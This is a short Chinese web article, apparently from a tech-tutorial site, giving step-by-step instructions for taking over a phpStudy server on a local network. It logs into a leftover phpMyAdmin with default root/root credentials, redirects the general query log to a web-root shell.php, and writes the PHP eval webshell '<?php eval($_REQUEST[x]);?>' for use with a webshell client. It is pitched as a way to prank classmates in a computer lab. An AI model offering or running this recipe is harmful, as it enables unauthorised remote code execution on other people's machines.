本篇内容主要讲解“phpstudy不删除phpMyAdmin有什么影响”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“phpstudy不删除phpMyAdmin有什么影响”吧!
发现一个phpstudy比较好玩的漏洞,在机房可以捉弄一下小伙伴
Win7虚拟机:192.168.195.132
与目标主机出在同一内网
使用phpstudy且没有删除phpMyAdmin文件
phpstudy装完之后会在根目录创建一个phpMyAdmin
文件
物理机访问一下phpMyAdmin
文件
用默认账号密码root
-root
登进去
在变量
栏处找到general log
,将它改成ON
将general log file
的地址改成E:\WWW\shell.php
去SQL
栏输入查询语句插入一句话木马
select '<?php eval($_REQUEST[x]);?>'
成功之后就可以打开菜刀连接了
免责声明:本站发布的内容(图片、视频和文字)以原创、来自互联网转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系QQ:712375056 进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
Copyright © 2009-2021 56dr.com. All Rights Reserved. 特网科技 特网云 版权所有 珠海市特网科技有限公司 粤ICP备16109289号
域名注册服务机构:阿里云计算有限公司(万网) 域名服务机构:烟台帝思普网络科技有限公司(DNSPod) CDN服务:阿里云计算有限公司 中国互联网举报中心 增值电信业务经营许可证B2
建议您使用Chrome、Firefox、Edge、IE10及以上版本和360等主流浏览器浏览本网站